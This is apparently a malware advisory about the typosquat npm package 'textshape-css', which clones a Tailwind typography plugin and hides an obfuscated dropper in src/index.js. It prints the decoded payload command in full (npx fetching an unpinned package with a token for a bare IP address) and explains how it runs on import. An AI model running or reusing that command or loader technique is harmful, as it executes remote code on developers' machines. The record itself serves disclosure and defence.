MAL-2026-6475

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (4e596e1ea1365aadfa6c75047b664bb41b29b60828595b9271d4c2c217476b60) The package presents itself as a Tailwind CSS typography plugin (its name, description, and source tree clone @tailwindcss/typography), but src/index.js appends an obfuscated payload that runs at module load. Char-code arrays at the bottom of src/index.js decode to `child_process`, `spawn`/`exec`, `/bin/sh`, and the command `npx -y runtimedev-link@latest --token "http://194.11.226.41:4000|zRlY7_JxvFY8_Zhhu8ih24iW_dT5Rb_9"`. A trailing `_.y();` invokes this immediately whenever any consumer does `require('textshape-css')` / `import 'textshape-css'`. On POSIX it spawns `/bin/sh -c 'nohup... >/dev/null 2>&1'` detached with stdio ignored; on Windows it goes via `child_process.exec` with `windowsHide`. The effect is to fetch and run an unpinned third-party npm package (`runtimedev-link@latest`) that beacons to a bare IP (194.11.226.41:4000) over plain HTTP with an attacker-supplied token — a remote-code-execution dropper. The package name and description are a near-verbatim typosquat of @tailwindcss/typography, targeting developers searching for that plugin.